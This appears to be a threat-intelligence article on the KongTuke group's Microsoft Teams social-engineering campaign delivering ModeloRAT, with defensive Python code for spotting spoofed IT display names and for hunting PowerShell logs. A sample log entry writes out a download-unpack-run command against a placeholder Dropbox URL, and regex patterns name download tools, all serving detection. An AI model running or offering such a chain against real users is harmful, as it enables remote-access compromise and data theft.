KongTuke hackers now use Microsoft Teams for corporate breaches
The KongTuke group has shifted to using Microsoft Teams for social engineering to breach corporate networks, delivering ModeloRAT after victims paste a PowerShell command received in a Teams chat. Active since April 2026, the operation rotates through multiple Microsoft 365 tenants to evade blocks and uses Unicode tricks to spoof IT staff. ModeloRAT now features a resilient five-server C2, multiple access paths, and enhanced persistence (Run keys, Startup shortcuts, VBScript launchers, scheduled tasks). Recommendations include restricting external Teams federation and hunting for signs of compromise with the IOCs published by ReliaQuest.

Executive Summary
- A new tactic from the initial access broker group KongTuke leverages Microsoft Teams to conduct social engineering attacks aimed at corporate networks.
- The method can establish a persistent foothold in under five minutes, starting from a targeted chat and a single PowerShell command.
- The payload delivered is ModeloRAT, a Python-based malware that has appeared in prior campaigns but has evolved to be more resilient and multi-path in its operation.
- The campaign has been active since at least April 2026, with KongTuke rotating through five Microsoft 365 tenants to avoid automated blocking.
The Rise of Collaboration-Platform Attacks
- Increasing use of collaboration tools: Attackers are increasingly using Microsoft Teams as a channel to reach employees and pose as IT or helpdesk staff.
- Social engineering via trusted platforms: By appearing to come from internal IT channels, attackers lower user suspicion and increase the likelihood of executing malicious commands.
- Quick transition to persistence: A single external Teams chat can move an operator from cold outreach to a persistent foothold in a matter of minutes.
Attack Vector and Social Engineering Tactics
- Initial access through Teams: The attacker engages a target in Teams chat, then tricks the user into running a malicious PowerShell command.
- Impersonation techniques: Unicode whitespace tricks are used to make the operator’s display name appear legitimate, aiding trust and reducing suspicion.
- One-click risk: The user is enticed to paste or execute a command that starts the chain, rather than opening a malicious attachment or link.
Delivery Chain and Payload Deployment
- PowerShell as the entry point: A single PowerShell command is shared via Teams to initiate the attack sequence.
- Payload download: The command downloads a ZIP archive from Dropbox containing a portable WinPython environment.
- ModeloRAT execution: The ZIP extracts and launches the Python-based ModeloRAT (Pmanager.py) on the host system.
- Capabilities of ModeloRAT: System and user information collection, screenshots, and potential exfiltration of files from the host filesystem.
ModeloRAT: Evolution and Capabilities
- Three key upgrades observed by researchers:
  1) A more resilient command-and-control (C2) architecture with a five-server pool, automatic failover, randomized URL paths, and self-update capability.
  2) Multiple independent access paths, including a primary RAT, a reverse shell, and a TCP backdoor, running on separate infrastructure to preserve access if one channel is disrupted.
  3) Expanded persistence mechanisms, including Run keys, Startup shortcuts, VBScript launchers, and SYSTEM-level scheduled tasks that may survive standard cleanup.
- Self-destruct caveats: The implant’s self-destruct routine does not remove the scheduled task, allowing persistence to survive reboots even after other components are wiped.
- Data and actions: The malware collects telemetry about the system, captures screenshots, and can exfiltrate files from the host, enabling both surveillance and data theft.
Campaign Footprint and Evasion Techniques
- Timeline and scope: Active since at least April 2026, with rapid churn across environments to evade detection.
- Tenant rotation: KongTuke rotates through five Microsoft 365 tenants, a tactic designed to avoid automated blocks and to maximize success across targets.
- Defense evasion: The use of multiple tenants and persistence mechanisms complicates detection and remediation efforts.
Defense Observations and Indicators of Compromise
- External Teams chats as foothold indicators: Persistent, unusual external communications via Teams can signal compromise when paired with suspicious commands.
- PowerShell misuse patterns: Look for unusual PowerShell commands that download and execute payloads from cloud storage services.
- Cross-tenant activity: Repeated access patterns across multiple tenants within a short time frame may indicate an initial access broker (IAB) campaign.
- Layered persistence artifacts: Run keys, Startup shortcuts, VBScript launchers, and scheduled tasks that survive standard cleanup procedures.
- Display name spoofing indicators: Unicode whitespace and other typographic tricks used to mimic legitimate IT staff.
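As an added example (not code from the report or from ReliaQuest), the following Python check applies the display-name indicator above to chat participants: it lists hidden Unicode whitespace and format characters in a name and flags an external account whose visible text reads as a trusted IT name. The trusted-name set and the sample names are constructed assumptions.

```python
import unicodedata

# Constructed: the organisation's genuine helpdesk names (assumed to come from the directory).
TRUSTED_NAMES = {"IT Helpdesk", "Service Desk"}

def invisible_chars(name: str) -> list[tuple[int, str]]:
    """Return (index, U+XXXX) for every character that renders blank or invisible: Unicode
    whitespace other than ASCII space, line/paragraph separators, format chars (Cf)."""
    found = []
    for i, ch in enumerate(name):
        if ch == " ":
            continue
        if ch.isspace() or unicodedata.category(ch) in ("Zs", "Zl", "Zp", "Cf"):
            found.append((i, f"U+{ord(ch):04X}"))
    return found

def canonical(name: str) -> str:
    """Collapse a name to what the eye reads: NFKC (em spaces become ASCII spaces),
    drop format characters, squeeze whitespace runs, casefold."""
    text = unicodedata.normalize("NFKC", name)
    text = "".join(ch for ch in text if unicodedata.category(ch) != "Cf")
    return " ".join(text.split()).casefold()

def assess_display_name(name: str, is_external: bool, trusted=TRUSTED_NAMES) -> dict:
    """Flag a participant whose name hides padding characters, or whose visible text
    begins with a trusted IT name while the account is outside the tenant."""
    canon = canonical(name)
    reads_as_it = any(canon == t or canon.startswith(t + " ")
                      for t in map(canonical, trusted))
    hidden = invisible_chars(name)
    reasons = []
    if hidden:
        reasons.append("hidden characters: " + ", ".join(c for _, c in hidden))
    if reads_as_it and is_external:
        reasons.append("external account reads as internal IT staff")
    return {"name": name, "suspicious": bool(reasons), "reasons": reasons}

# Constructed samples: a genuine internal account, an external account padded with em
# spaces and a zero-width space so "(External)" is pushed out of view, a normal contact.
SAMPLES = [
    ("IT Helpdesk", False),
    ("IT Helpdesk\u2003\u2003\u2003\u200b(External)", True),
    ("Alice Example", True),
]

if __name__ == "__main__":
    for name, external in SAMPLES:
        print(assess_display_name(name, external))
```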
Defensive Notes and Detection Opportunities
- Network and identity controls: Consider policies that restrict or monitor collaboration-platform outreach from untrusted sources.
- Threat hunting guidance: Investigate for the presence of the ModeloRAT family, unusual ZIP downloads from cloud storage, and Python-based payloads that appear after PowerShell execution.
- Forensic considerations: Prioritize traces of cross-tenant activity, multiple C2 paths, and scheduled tasks that survive reboots as indicators to verify persistence.
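An added example, not from the report: a Python hunt over constructed PowerShell script-block log entries that scores each command for the download-unpack-run chain described above and for a cloud-storage download source. The host list, sample entries and placeholder URL are assumptions.

```python
import re
from urllib.parse import urlparse

# Consumer file-sharing hosts to treat as untrusted download sources. Dropbox is the
# host named in the report; the list is an assumption to extend from your own telemetry.
CLOUD_STORAGE_HOSTS = {"dropbox.com", "dropboxusercontent.com"}

# One pattern per stage of the delivery chain: fetch the archive, unpack it, run the
# bundled interpreter. Matched case-insensitively against the script block text.
STAGES = {
    "download": re.compile(r"\b(Invoke-WebRequest|iwr|curl|wget|DownloadFile|DownloadString|Start-BitsTransfer)\b", re.I),
    "unpack": re.compile(r"(\bExpand-Archive\b|ZipFile\]::ExtractToDirectory|\btar\s+-x)", re.I),
    "interpreter": re.compile(r"\bpythonw?(?:\.exe)?\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)

def cloud_hosts(script: str) -> set[str]:
    """Hostnames in the script block that belong to a cloud-storage domain."""
    hosts = set()
    for url in URL_RE.findall(script):
        host = (urlparse(url).hostname or "").lower()
        if any(host == d or host.endswith("." + d) for d in CLOUD_STORAGE_HOSTS):
            hosts.add(host)
    return hosts

def score_script_block(script: str) -> dict:
    """Count chain stages present plus a cloud-storage source; alert at three or more,
    so a plain intranet download-and-unpack does not fire but the full chain does."""
    stages = [name for name, rx in STAGES.items() if rx.search(script)]
    hosts = sorted(cloud_hosts(script))
    score = len(stages) + (1 if hosts else 0)
    return {"score": score, "stages": stages, "cloud_hosts": hosts, "alert": score >= 3}

# Constructed script-block log entries (Event 4104 style), not from the report: an admin's
# intranet download, the Teams-delivered chain with a placeholder URL, a developer running pip.
SAMPLE_EVENTS = [
    {"user": "CORP\\admin", "script": r"Invoke-WebRequest https://intranet.example.local/tools.zip -OutFile C:\Tools\tools.zip; Expand-Archive C:\Tools\tools.zip C:\Tools"},
    {"user": "CORP\\jdoe", "script": r"iwr 'https://www.dropbox.com/s/PLACEHOLDER/wp.zip?dl=1' -OutFile $env:TEMP\wp.zip; Expand-Archive $env:TEMP\wp.zip $env:TEMP\wp; & $env:TEMP\wp\python\python.exe $env:TEMP\wp\Pmanager.py"},
    {"user": "CORP\\dev", "script": r"python.exe -m pip install requests"},
]

def hunt(events=SAMPLE_EVENTS) -> list[dict]:
    """Return the events whose script block scores as the download-unpack-run chain."""
    scored = [dict(e, **score_script_block(e["script"])) for e in events]
    return [s for s in scored if s["alert"]]

if __name__ == "__main__":
    for hit in hunt():
        print(hit["user"], hit["score"], hit["stages"], hit["cloud_hosts"])
```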
Visual Aids and Artifacts
- The source report includes figures of the PowerShell payload, the ZIP download chain, and the persistent scheduled task, illustrating the flow from initial contact to persistence and data access.
Implications for Organizations
- Collaboration tools as attack surfaces: The shift from web-based lures to platform-based social engineering represents a broadened attack surface for initial access.
- Rapid foothold capability: A compact sequence from outreach to persistence in under five minutes highlights the need for rapid detection and containment.
- Multi-path persistence risk: The combination of multiple RAT variants and diverse persistence mechanisms complicates cleanup and long-term remediation.
Notes on Campaign Context
- The described activity marks a notable evolution in KongTuke’s tactics, expanding beyond prior web-based lures to leverage a widely used enterprise collaboration platform for initial access.
- The observed behavior emphasizes the importance of monitoring and contextualizing unusual activity across Teams, PowerShell usage, and cross-tenant access patterns to identify suspicious campaigns early.